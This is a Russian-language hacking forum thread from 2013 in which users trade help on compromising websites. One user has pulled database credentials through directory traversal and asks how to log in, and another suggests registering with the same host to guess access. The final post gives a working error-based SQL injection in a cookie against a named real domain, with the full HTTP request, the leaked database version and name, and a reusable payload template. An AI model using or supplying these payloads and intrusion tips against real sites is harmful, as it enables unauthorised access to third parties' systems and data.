 |
|
02.03.2013, 14:42
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
panfilov1991, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри
|
|
|
02.03.2013, 17:34
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)
|
|
|
|
02.03.2013, 17:51
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).
Нашел следующий скрипт sql.php:
Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?
Спасибо |
|
|
|
02.03.2013, 17:52
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
zloy_fantom, только если есть шел на уязвимой машине
|
|
|
|
02.03.2013, 17:59
|
|
Познающий
Регистрация: 23.10.2011
Сообщений: 71
С нами:
7660406
Репутация:
3
|
|
Кто может подсказать по xss. Напишите пожалуйста в личку.
|
|
|
|
02.03.2013, 20:04
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от Melfis
panfilov1991
, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!
|
|
|
|
02.03.2013, 21:02
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
|
|
|
|
02.03.2013, 21:03
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от panfilov1991
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.
|
|
|
|
02.03.2013, 21:07
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от cat1vo
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
Сообщение от None
помогите
Пожалуйста
|
|
|
|
02.03.2013, 21:08
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от OxoTnik
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...
Код:
Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"
Duplicate entry ' 5.5.29-1-log:s10parl' for key 'group_key'
Версия - 5.5.29-1-log
Названия Базы Данных - s10parl
"or(1)group+by(mid(( СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
